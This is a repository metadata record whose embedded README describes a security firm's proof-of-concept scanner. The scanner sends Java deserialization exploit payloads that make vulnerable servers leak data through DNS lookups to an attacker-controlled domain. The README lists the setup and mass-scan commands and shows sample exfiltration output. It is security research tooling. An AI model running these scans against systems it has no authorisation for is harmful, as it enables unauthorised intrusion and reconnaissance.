{"id":18303530,"url":"https://github.com/gosecure/break-fast-serial","last_synced_at":"2025-04-05T15:30:58.439Z","repository":{"id":97083208,"uuid":"85815425","full_name":"GoSecure/break-fast-serial","owner":"GoSecure","description":"A proof of concept that demonstrates asynchronous scanning for Java deserialization bugs","archived":false,"fork":false,"pushed_at":"2017-03-27T21:34:22.000Z","size":33,"stargazers_count":54,"open_issues_count":0,"forks_count":16,"subscribers_count":7,"default_branch":"master","last_synced_at":"2025-03-21T06:33:24.758Z","etag":null,"topics":["exploit","java","security","serialization","tool","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/GoSecure.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-03-22T10:35:16.000Z","updated_at":"2023-03-13T03:49:30.000Z","dependencies_parsed_at":null,"dependency_job_id":"512ca24f-60b9-4513-84cb-752f227be110","html_url":"https://github.com/GoSecure/break-fast-serial","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GoSecure%2Fbreak-fast-serial","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GoSecure%2Fbreak-fast-serial/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GoSecure%2Fbreak-fast-serial/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GoSecure%2Fbreak-fast-serial/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/GoSecure","download_url":"https://codeload.github.com/GoSecure/break-fast-serial/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247358446,"owners_count":20926219,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","java","security","serialization","tool","vulnerability"],"created_at":"2024-11-05T15:25:56.953Z","updated_at":"2025-04-05T15:30:58.433Z","avatar_url":"https://github.com/GoSecure.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Break Fast Serial\n\nA proof of concept that demonstrates asynchronous scanning of deserialization bugs. It repackages [well known exploits](https://github.com/breenmachine/JavaUnserializeExploits) with a modified gadget that triggers DNS queries.\n\nDetailed explanation: http://gosecure.net/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/\n\n## DNS Chef configuration\n\nThe DNS Chef instance is a requirement to see the results of the scan.\n\nThis is the typical DNS configuration expected on your domain registrar. It will signify to other DNS servers that all subdomains of `attacker.com` must be resolved by the DNS server host at `10.11.12.13`.\n```\nNS scanme.attacker.com dnschef.attacker.com\nA dnschef.attacker.com 10.11.12.13\n```\n\n - `10.11.12.13` : The public IP address that is \n - `attacker.com` : A domain name you own\n\nIt is highly recommended to use this [modified version of DNS Chef](./dnschef) that decodes the metadata placed by the scanner.\n\n## Single IP scan\n\nLaunch DNSChef\n```\npython dnschef.py -q --fakeip 127.0.0.1 -i 0.0.0.0\n```\n\nLaunch the scanner\n```\npython breakfast.py -t 192.168.40.1 -p 7001 -d scanme.attacker.com\n```\n\n## Mass Scan\n\nBuild a list of ip/hostname with open **HTTP** ports. Use a port scanner such as NMAP to identify port that respond to HTTP.\n```\n$ cat list_servers.txt\n192.168.40.10:80\n192.168.40.24:8181\n192.168.40.100:7001\n192.168.40.100:8080\n192.168.40.102:8080\n192.168.40.102:8001\n```\n\nLaunch DNSChef\n```\npython dnschef.py -q --fakeip 127.0.0.1 -i 0.0.0.0\n```\n\nLaunch the scanner\n```\ncat list_servers.txt | python breakfast.py -stdin -d scanme.attacker.com\n```\n\n## Expected response\n\nIf the vulnerability is confirmed, the expected trace from DNS Chef is as follows.\n\n```\n['843', 'jboss', '192.168.40.24', '8181']\n[06:16:44] 69.165.172.165: cooking the response of type 'A' for 3834333a6a626f73733a3132372e302e302e313a38313831.scanme.fsociety.com to 127.0.0.1\n['914', 'jenkins-cli', '192.168.40.102', '8080']\n[06:16:45] 173.194.103.14: cooking the response of type 'A' for 3931343a6a656e6b696e732d636c693a3132372e302e302e313a38303830.scanme.fsociety.com to 127.0.0.1\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgosecure%2Fbreak-fast-serial","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgosecure%2Fbreak-fast-serial","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgosecure%2Fbreak-fast-serial/lists"}